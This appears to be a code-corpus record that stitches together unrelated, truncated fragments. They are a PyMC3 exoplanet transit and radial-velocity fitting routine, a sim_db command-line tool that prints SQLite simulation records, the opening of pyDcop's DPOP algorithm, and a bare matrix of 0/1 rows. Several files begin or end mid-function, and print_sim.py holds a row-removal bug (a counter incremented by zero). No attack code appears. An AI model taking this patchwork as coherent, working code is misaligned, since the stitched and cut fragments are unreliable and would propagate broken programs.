(1/a_Rs) * pm.math.sqrt( (1-r)**2 - b**2 )
* (1/sini)
)*24
)
#
# mean model and likelihood
#
mean_model = mu_transit + mean
mu_model = pm.Deterministic('mu_model', mean_model)
likelihood = pm.Normal('obs', mu=mean_model, sigma=sigma,
observed=self.y_obs)
# Optimizing
map_estimate = pm.find_MAP(model=model)
# start = model.test_point
# if 'transit' in self.modelcomponents:
# map_estimate = xo.optimize(start=start,
# vars=[r, b, period, t0])
# map_estimate = xo.optimize(start=map_estimate)
# Plot the simulated data and the maximum a posteriori model to
# make sure that our initialization looks ok.
self.y_MAP = (
map_estimate['mean'] + map_estimate['mu_transit']
)
if make_threadsafe:
pass
else:
# as described in
# https://github.com/matplotlib/matplotlib/issues/15410
# matplotlib is not threadsafe. so do not make plots before
# sampling, because some child processes tries to close a
# cached file, and crashes the sampler.
print(map_estimate)
if self.PLOTDIR is None:
raise NotImplementedError
outpath = os.path.join(self.PLOTDIR,
'test_{}_MAP.png'.format(self.modelid))
plot_MAP_phot(self.x_obs, self.y_obs, self.y_MAP, outpath)
# sample from the posterior defined by this model.
trace = pm.sample(
tune=self.N_samples, draws=self.N_samples,
start=map_estimate, cores=self.N_cores,
chains=self.N_chains,
step=xo.get_dense_nuts_step(target_accept=0.8),
)
with open(pklpath, 'wb') as buff:
pickle.dump({'model': model, 'trace': trace,
'map_estimate': map_estimate}, buff)
self.model = model
self.trace = trace
self.map_estimate = map_estimate
def run_rv_inference(self, prior_d, pklpath, make_threadsafe=True):
# if the model has already been run, pull the result from the
# pickle. otherwise, run it.
if os.path.exists(pklpath):
d = pickle.load(open(pklpath, 'rb'))
self.model = d['model']
self.trace = d['trace']
self.map_estimate = d['map_estimate']
return 1
with pm.Model() as model:
# Fixed data errors.
sigma = self.y_err
# Define priors and PyMC3 random variables to sample over.
# Stellar parameters. (Following tess.world notebooks).
logg_star = pm.Normal("logg_star", mu=prior_d['logg_star'][0],
sd=prior_d['logg_star'][1])
r_star = pm.Bound(pm.Normal, lower=0.0)(
"r_star", mu=prior_d['r_star'][0], sd=prior_d['r_star'][1]
)
rho_star = pm.Deterministic(
"rho_star", factor*10**logg_star / r_star
)
# RV parameters.
# Chen & Kipping predicted M: 49.631 Mearth, based on Rp of 8Re. It
# could be bigger, e.g., 94m/s if 1 Mjup.
# Predicted K: 14.26 m/s
#K = pm.Lognormal("K", mu=np.log(prior_d['K'][0]),
# sigma=prior_d['K'][1])
log_K = pm.Uniform('log_K', lower=prior_d['log_K'][0],
upper=prior_d['log_K'][1])
K = pm.Deterministic('K', tt.exp(log_K))
period = pm.Normal("period", mu=prior_d['period'][0],
sigma=prior_d['period'][1])
ecs = xo.UnitDisk("ecs", testval=np.array([0.7, -0.3]))
ecc = pm.Deterministic("ecc", tt.sum(ecs ** 2))
omega = pm.Deterministic("omega", tt.arctan2(ecs[1], ecs[0]))
phase = xo.UnitUniform("phase")
# use time of transit, rather than time of periastron. we do, after
# all, know it.
t0 = pm.Normal(
"t0", mu=prior_d['t0'][0], sd=prior_d['t0'][1],
testval=prior_d['t0'][0]
)
orbit = xo.orbits.KeplerianOrbit(
period=period, t0=t0, rho_star=rho_star, ecc=ecc, omega=omega,
r_star=r_star
)
#FIXME edit these
# noise model parameters: FIXME what are these?
S_tot = pm.Lognormal("S_tot", mu=np.log(prior_d['S_tot'][0]),
sigma=prior_d['S_tot'][1])
ell = pm.Lognormal("ell", mu=np.log(prior_d['ell'][0]),
sigma=prior_d['ell'][1])
# per instrument parameters
means = pm.Normal(
"means",
mu=np.array([np.median(self.y_obs[self.telvec == u]) for u in
self.uniqueinstrs]),
sigma=500,
shape=self.num_inst,
)
# different instruments have different intrinsic jitters. assign
# those based on the reported error bars. (NOTE: might inflate or
# overwrite these, for say, CHIRON)
sigmas = pm.HalfNormal(
"sigmas",
sigma=np.array([np.median(self.y_err[self.telvec == u]) for u
in self.uniqueinstrs]),
shape=self.num_inst
)
# Compute the RV offset and jitter for each data point depending on
# its instrument
mean = tt.zeros(len(self.x_obs))
diag = tt.zeros(len(self.x_obs))
for i, u in enumerate(self.uniqueinstrs):
mean += means[i] * (self.telvec == u)
diag += (self.y_err ** 2 + sigmas[i] ** 2) * (self.telvec == u)
pm.Deterministic("mean", mean)
pm.Deterministic("diag", diag)
# NOTE: local function definition is jank
def rv_model(x):
return orbit.get_radial_velocity(x, K=K)
kernel = xo.gp.terms.SHOTerm(S_tot=S_tot, w0=2*np.pi/ell, Q=1.0/3)
# NOTE temp
gp = xo.gp.GP(kernel, self.x_obs, diag, mean=rv_model)
# gp = xo.gp.GP(kernel, self.x_obs, diag,
# mean=orbit.get_radial_velocity(self.x_obs, K=K))
# the actual "conditioning" step, i.e. the likelihood definition
gp.marginal("obs", observed=self.y_obs-mean)
pm.Deterministic("gp_pred", gp.predict())
map_estimate = model.test_point
map_estimate = xo.optimize(map_estimate, [means])
map_estimate = xo.optimize(map_estimate, [means, phase])
map_estimate = xo.optimize(map_estimate, [means, phase, log_K])
map_estimate = xo.optimize(map_estimate, [means, t0, log_K, period, ecs])
map_estimate = xo.optimize(map_estimate, [sigmas, S_tot, ell])
map_estimate = xo.optimize(map_estimate)
#
# Derived parameters
#
#TODO
# # planet radius in jupiter radii
# | |
<filename>sim_db/src_command_line_tool/commands/print_sim.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Print parameters of simulations ran or running, i.e. content of database.
Print the content of database with a number of possible restrictions.
"""
# Copyright (C) 2017-2019 <NAME> <<EMAIL>>
# Licenced under the MIT License.
if __name__ == '__main__':
import add_package_root_to_path
import sim_db.src_command_line_tool.commands.helpers as helpers
import sqlite3
import argparse
import shlex
import sys
import os
def command_line_arguments_parser(name_command_line_tool="sim_db",
name_command="print_sim"):
parser = argparse.ArgumentParser(
description=("Print content in sim.db. The default configuration "
"corresponding to the '-p default' option is applied first, as "
"long as the '--columns'/'-c' option is not passed. It can can "
"however be overwritten, as only the last occcurence of any "
"flag is used."),
prog="{0} {1}".format(name_command_line_tool, name_command))
parser.add_argument(
'--id', '-i', type=int, nargs='+', help="List of ID's.")
parser.add_argument(
'--not_id',
type=int,
nargs='+',
help="List of ID's not to print. Takes president over '--id'.")
parser.add_argument(
'-n', type=int, help="Number of row printed from the bottom up.")
parser.add_argument(
'--columns',
'-c',
type=str,
nargs='+',
default=None,
help="Name of the columns to print.")
parser.add_argument(
'--not_columns',
type=str,
nargs='+',
default=None,
help=("Name of the columns not to print. Takes presidents over "
"'--columns'."))
parser.add_argument(
'--col_by_num',
type=int,
nargs='+',
default=None,
help=("Number of the columns to print. All non empty columns are "
"printed by default."))
parser.add_argument(
'--where',
'-w',
default='id > -1',
help=
("Add constraints to which columns to print. Must be a valid "
"SQL (sqlite3) command when added after WHERE in a SELECT command."
))
parser.add_argument(
'--sort_by',
default='id',
help=
("What to sort the output by. Must be a valid SQL (sqlite3) "
"command when added after ORDER BY in a SELECT search. Defalut is "
"id."))
parser.add_argument(
'--column_names',
action='store_true',
help="Print name and type of all columns.")
parser.add_argument(
'--all_columns',
action='store_true',
help="Print all columns. Takes president over '--not_columns'.")
parser.add_argument(
'--empty_columns',
action='store_true',
help=("Print empty columns. Otherwise only non empty columns are "
"printed."))
parser.add_argument(
'--params',
action='store_true',
help=("Print the parameters added before the simulation run."))
parser.add_argument(
'--results',
action='store_true',
help=("Print results - the parameters added during the simulation, "
"excluding metadata."))
parser.add_argument(
'--metadata',
action='store_true',
help=("Print metadata. '--params', '--results' and '--metadata' "
"will together print all non empty columns."))
parser.add_argument(
'--no_headers',
action='store_true',
help="Print without any headers.")
parser.add_argument(
'--max_width',
type=int,
default=None,
help=("Upper limit for the width of each column. Default is no "
"limit."))
parser.add_argument(
'--first_line',
action='store_true',
help="Print only the first line of any entry.")
parser.add_argument(
'--vertically',
'-v',
action='store_true',
help="Print columns vertically.")
parser.add_argument(
'-p',
type=str,
default=None,
help=
("Personal print configuration. Substituted with the print "
"configuration in 'settings.txt' corresponding to the provided "
"key string."))
parser.add_argument(
'--diff',
'-d',
action='store_true',
help=
("Remove columns with the same value for all the "
"simulations. This leaves only the parameters that are different "
"between the simulations."))
return parser
def get_personalized_print_config(key_string):
settings = helpers.Settings()
print_configs = settings.read('print_config')
for line in print_configs:
split_line = line.split(':')
if len(split_line) > 1:
if key_string.strip() == split_line[0].strip():
return split_line[1].strip()
return None
metadata_columns = ['status', 'add_to_job_script', 'max_walltime', 'n_tasks',
'job_id', 'time_submitted', 'time_started', 'used_walltime',
'cpu_info', 'git_hash', 'commit_message', 'git_diff',
'git_diff_stat', 'sha1_executables', 'initial_parameters']
def get_initial_parameters_columns(db_cursor, args):
ids = []
if args.where != None:
try:
db_cursor.execute("SELECT id FROM runs WHERE {0};".format(args.where))
except sqlite3.OperationalError as e:
if str(e) == "no such table: runs":
print("There does NOT exist a database yet.\n"
"Try adding a simulation from a parameter file.")
exit(1)
else:
raise e
ids = [id_tuple[0] for id_tuple in db_cursor.fetchall()]
if args.id != None:
if len(ids) > 0:
ids = [i for i in ids if i in args.id]
else:
ids = args.id
all_initial_parameters = []
for i in ids:
db_cursor.execute("SELECT initial_parameters FROM runs WHERE id={0}"
.format(i))
initial_parameters = db_cursor.fetchone()[0]
if initial_parameters != None:
initial_parameters, correct_type = (
helpers.convert_text_to_correct_type(
initial_parameters, 'string array'))
all_initial_parameters = all_initial_parameters + initial_parameters
all_initial_parameters = list(set(all_initial_parameters))
return all_initial_parameters
def add_columns(new_columns, columns, column_names):
for col in new_columns:
if col not in column_names:
column_names.append(col)
columns += ", {0}".format(col)
if len(columns) > 2 and columns[0:2] == ", ":
columns = columns[2:]
return (columns, column_names)
def select_command(name_command_line_tool, name_command, db_cursor, args,
all_column_names):
columns = ""
column_names = []
if args.columns != None:
columns, column_names = add_columns(args.columns, columns,
column_names)
if args.col_by_num != None:
new_columns = [all_column_names[i] for i in args.col_by_num]
columns, column_names = add_columns(new_columns, columns, column_names)
if args.params:
parameter_columns = get_initial_parameters_columns(db_cursor, args)
columns, column_names = add_columns(parameter_columns, columns,
column_names)
if args.results:
parameter_columns = get_initial_parameters_columns(db_cursor, args)
result_columns = [
c for c in all_column_names
if (c not in parameter_columns and c not in metadata_columns)
]
columns, column_names = add_columns(result_columns, columns,
column_names)
if args.metadata:
columns, column_names = add_columns(metadata_columns, columns,
column_names)
if columns == "" or args.all_columns:
columns = '*'
column_names = all_column_names
for col in column_names:
if col not in all_column_names:
print("ERROR: {0} is NOT a column in the database.\n"
"Run command '{1} {2} --column_names' to see all the columns "
"in the database.".format(col, name_command_line_tool,
name_command))
exit(1)
if args.id == None:
try:
db_cursor.execute("SELECT {0} FROM runs WHERE {1} ORDER BY {2};"
.format(columns, args.where, args.sort_by))
except sqlite3.OperationalError as e:
if str(e) == "no such table: runs":
print("There do NOT exists a database yet.\n"
"Try adding a simulation from a parameter file.")
exit(1)
else:
raise e
selected_output = db_cursor.fetchall()
else:
selected_output = []
for i in args.id:
restrictions = args.where + " AND id = {0}".format(i)
try:
db_cursor.execute(
"SELECT {0} FROM runs WHERE {1} ORDER BY {2};".format(
columns, restrictions, args.sort_by))
except sqlite3.OperationalError as e:
if str(e) == "no such table: runs":
print("There do NOT exists a database yet.\n"
"Try adding a simulation from a parameter file.")
exit(1)
else:
raise e
output = db_cursor.fetchall()
if len(output) == 0:
if (len(restrictions) > 12
and restrictions[0:12] == 'id > -1 AND '):
restrictions = restrictions[12:]
print("There exists no entries in the database with: {0}"
.format(restrictions))
exit(1)
selected_output.append(output[0])
selected_output = [list(row) for row in selected_output]
if (not args.all_columns and not args.empty_columns):
selected_output, column_names = remove_empty_columns(
selected_output, column_names, args)
if (args.not_columns != None and not args.all_columns):
selected_output, column_names = remove_columns_not_to_print(
selected_output, column_names, args.not_columns)
if args.not_id != None:
selected_output = remove_rows_not_to_print(selected_output,
args.not_id)
n = args.n
if n == None:
n = len(selected_output)
selected_output = selected_output[-n:]
return selected_output, column_names
def remove_empty_columns(selected_output, column_names, args):
columns_not_to_remove = []
if args.columns != None:
columns_not_to_remove = args.columns
if args.col_by_num != None:
columns_by_num = [all_column_names[i] for i in args.col_by_num]
columns_not_to_remove = columns_not_to_remove + columns_by_num
if len(selected_output) == 0:
return selected_output, column_names
columns_to_remove = []
for col in range(len(selected_output[0])):
if (all(elem is None for elem in [row[col] for row in selected_output])
and column_names[col] not in columns_not_to_remove):
columns_to_remove.append(col)
n_deleted = 0
for col in columns_to_remove:
for row in selected_output:
del row[col - n_deleted]
del column_names[col - n_deleted]
n_deleted += 1
return selected_output, column_names
def remove_columns_not_to_print(selected_output, column_names,
not_columns):
if len(selected_output) == 0:
return selected_output, column_names
columns_to_remove = []
for i, col_name in enumerate(column_names):
for col_name_no_print in not_columns:
if col_name == col_name_no_print:
columns_to_remove.append(i)
n_deleted = 0
for col in columns_to_remove:
for row in selected_output:
del row[col - n_deleted]
del column_names[col - n_deleted]
n_deleted += 1
return selected_output, column_names
def remove_rows_not_to_print(selected_output, not_id):
rows_to_remove = []
for j in range(len(selected_output)):
for i in not_id:
if selected_output[j][0] == i:
rows_to_remove.append(j)
n_deleted = 0
for j in rows_to_remove:
del selected_output[j - n_deleted]
n_deleted += 0
return selected_output
def get_max_widths(selected_output, column_names, no_headers, extra_space):
if len(selected_output) == 0:
return selected_output
widths = []
for col in range(len(selected_output[0])):
if no_headers:
max_width = 0
else:
max_width = len(column_names[col])
for row in range(len(selected_output)):
if max_width < len(str(selected_output[row][col]).split('\n')[0]):
max_width = len(str(selected_output[row][col]).split('\n')[0])
widths.append(max_width + extra_space)
return widths
def remove_columns_with_only_same_values(selected_output, column_names):
column_indices_to_remove = []
for column_index in range(len(column_names)):
remove_column = True
for row_index in range(len(selected_output) - 1):
if (selected_output[row_index][column_index] !=
selected_output[row_index + 1][column_index]):
remove_column = False
break
if remove_column:
column_indices_to_remove.append(column_index)
for i in reversed(column_indices_to_remove):
del column_names[i]
for row in range(len(selected_output)):
del selected_output[row][i]
return selected_output, column_names
def print_selected_parameters(selected_output, column_names, no_headers,
max_width, first_line):
extra_space = 2
widths = get_max_widths(selected_output, column_names, no_headers,
extra_space)
if not no_headers:
headers = ""
total_width = 0
for w, col in zip(widths, column_names):
column_header = col + (w - len(col)) * " "
if max_width and w > max_width:
column_header = column_header[:max_width] + extra_space * " "
total_width += max_width + extra_space
else:
total_width += w
headers += column_header
print(headers)
print(total_width * "=")
for row in selected_output:
| |
<reponame>gauthier-emse/pyDcop<filename>pydcop/algorithms/dpop.py
# BSD-3-Clause License
#
# Copyright 2017 Orange
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
DPOP: Dynamic Programming Optimization Protocol
-----------------------------------------------
Dynamic Programming Optimization Protocol is an optimal,
inference-based, dcop algorithm implementing a dynamic programming procedure
in a distributed way :cite:`petcu_distributed_2004`.
DPOP works on a Pseudo-tree, which can be built using the
:ref:`distribute<pydcop_commands_distribute>` command
(and is automatically built when using the :ref:`solve<pydcop_commands_solve>` command).
This algorithm has no parameter.
Example
^^^^^^^
::
pydcop -algo dpop graph_coloring_eq.yaml
"""
from random import choice
from typing import Iterable
from pydcop.computations_graph.pseudotree import get_dfs_relations
from pydcop.infrastructure.computations import Message, VariableComputation, register
from pydcop.dcop.objects import Variable
from pydcop.dcop.relations import (
NAryMatrixRelation,
Constraint,
find_arg_optimal,
join,
projection,
)
from pydcop.algorithms import ALGO_STOP, ALGO_CONTINUE, ComputationDef
GRAPH_TYPE = "pseudotree"
def build_computation(comp_def: ComputationDef):
computation = DpopAlgo(comp_def)
return computation
def computation_memory(*args):
raise NotImplementedError("DPOP has no computation memory implementation (yet)")
def communication_load(*args):
raise NotImplementedError("DPOP has no communication_load implementation (yet)")
class DpopMessage(Message):
def __init__(self, msg_type, content):
super(DpopMessage, self).__init__(msg_type, content)
@property
def size(self):
# Dpop messages
# UTIL : multi-dimensional matrices
# VALUE :
if self.type == "UTIL":
# UTIL messages are multi-dimensional matrices
shape = self.content.shape
size = 1
for s in shape:
size *= s
return size
elif self.type == "VALUE":
# VALUE message are a value assignment for each var in the
# separator of the sender
return len(self.content[0]) * 2
def __str__(self):
return f"DpopMessage({self._msg_type}, {self._content})"
class DpopAlgo(VariableComputation):
"""
DPOP: Dynamic Programming Optimization Protocol
When running this algorithm, the DFS tree must be already defined and the
children, parents and pseudo-parents must be known.
In DPOP:
* A computation represents, and select a value for, one variable.
* A constraint is managed (i.e. referenced) by a single computation object:
this means that, when building the computations, each constraint must only be
passed as argument to a single computation.
* A constraint must always be managed by the lowest node in the DFS
tree that the relation depends on (which is especially important for
non-binary relation). The pseudo-tree building mechanism already
takes care of this.
DPOP computations support two kinds of messages:
* UTIL message:
sent from children to parent, contains a relation (as a
multi-dimensional matrix) with one dimension for each variable in our
separator.
* VALUE messages :
contains the value of the parent of the node and the values of all
variables that were present in our UTIl message to our parent (that is
to say, our separator) .
Parameters
----------
variable: Variable
The Variable object managed by this algorithm
parent: variable name (str)
the parent for this node. A node has at most one parent
but may have 0-n pseudo-parents. Pseudo parent are not given
explicitly but can be deduced from the constraints and children
(if the union of the constraints' scopes contains a variable that is not a
children, it must necessarily be a pseudo-parent).
If the variable shares a constraints with its parent (which is the
most common case), it must be present in the relation arg.
children: name of children variables (list of str)
the children variables of the variable argument, in the DFS tree
constraints: List of Constraints
constraints managed by this computation. These
relations will be used when calculating costs. It must
depends on the variable arg. Unary relation are also supported.
Remember that a relation must always be managed by the lowest node in
the DFS tree that the relation depends on (which is especially
important for non-binary relation).
comp_def: ComputationDef
computation definition, gives the algorithm name (must be dpop) and the mode
(min or max)
"""
def __init__(self, comp_def: ComputationDef):
assert comp_def.algo.algo == "dpop"
super().__init__(comp_def.node.variable, comp_def)
self._mode = comp_def.algo.mode
self._parent, self._pseudo_parents, self._children, self._pseudo_children = get_dfs_relations(
self.computation_def.node
)
# Filter the relations on all the nodes of the DFS tree to only keep the
# relation on the on the lowest node in the tree that is involved in the
# relation.
self._constraints = []
descendants = self._pseudo_children + self._children
self.logger.debug(f"Descendants for computation {self.name}: {descendants} ")
constraints = list(comp_def.node.constraints)
for r in comp_def.node.constraints:
# filter out all relations that depends on one of our descendants
names = [v.name for v in r.dimensions]
for descendant in descendants:
if descendant in names:
constraints.remove(r)
break
self._constraints = constraints
self.logger.debug(
f"Constraints for computation {self.name}: {self._constraints} "
)
if hasattr(self._variable, "cost_for_val"):
costs = []
for d in self._variable.domain:
costs.append(self._variable.cost_for_val(d))
self._joined_utils = NAryMatrixRelation(
[self._variable], costs, name="joined_utils"
)
else:
self._joined_utils = NAryMatrixRelation([], name="joined_utils")
self._children_separator = {}
self._waited_children = []
if not self.is_leaf:
# If we are not a leaf, we must wait for the util messages from
# our children.
# This must be done in __init__ and not in on_start because we
# may get an util message from one of our children before
# running on_start, if this child computation start faster of
# before us
self._waited_children = list(self._children)
def footprint(self):
return computation_memory(self.computation_def.node)
@property
def is_root(self):
return self._parent is None
@property
def is_leaf(self):
return len(self._children) == 0
def on_start(self):
if self.is_leaf and not self.is_root:
# If we are a leaf in the DFS Tree we can immediately compute
# our util and send it to our parent.
# Note: as a leaf, our separator is the union of our parents and
# pseudo-parents
util = self._compute_utils_msg()
self.logger.info(
f"Leaf {self._variable.name} init message {self._variable.name} -> {self._parent} : {util}"
)
msg = DpopMessage("UTIL", util)
self.post_msg(self._parent, msg)
elif self.is_leaf:
# we are both root and leaf : means we are a isolated variable we
# can select our own value alone:
if self._constraints:
for r in self._constraints:
self._joined_utils = join(self._joined_utils, r)
values, current_cost = find_arg_optimal(
self._variable, self._joined_utils, self._mode
)
self.select_value_and_finish(values[0], float(current_cost))
elif hasattr(self._variable, "cost_for_val"):
# The variable has no constraint with other variable but has a cost function,
# (i.e a unary constraint) : select the value that optimize that constraint.
self.logger.debug(
f"Selecting value for {self._variable.name} based only on cost function"
)
values, current_cost = find_arg_optimal(
self._variable, self._joined_utils, self._mode
)
self.select_value_and_finish(values[0], float(current_cost))
else:
# If the variable is not constrained, we can simply take a value at
# random:
self.logger.debug(
f"Selecting random value for {self._variable.name} (not constrained)"
)
value = choice(self._variable.domain)
self.select_value_and_finish(value, 0.0)
def stop_condition(self):
# dpop stop condition is easy at it only selects one single value !
if self.current_value is not None:
return ALGO_STOP
else:
return ALGO_CONTINUE
def select_value_and_finish(self, value, cost):
"""
Select a value for this variable.
DPOP is not iterative, once we have selected our value the algorithm
is finished for this computation.
Parameters
----------
value: any (depends on the domain)
the selected value
cost: float
the local cost for this value
"""
self.value_selection(value, cost)
self.stop()
self.finished()
self.logger.info(f"Value selected at {self.name} : {value} - {cost}")
@register("UTIL")
def _on_util_message(self, variable_name, recv_msg, t) -> None:
"""
Message handler for UTIL messages.
Parameters
| |
0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 1],
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 1],
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1],
[0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1],
[0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1],
[0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1],
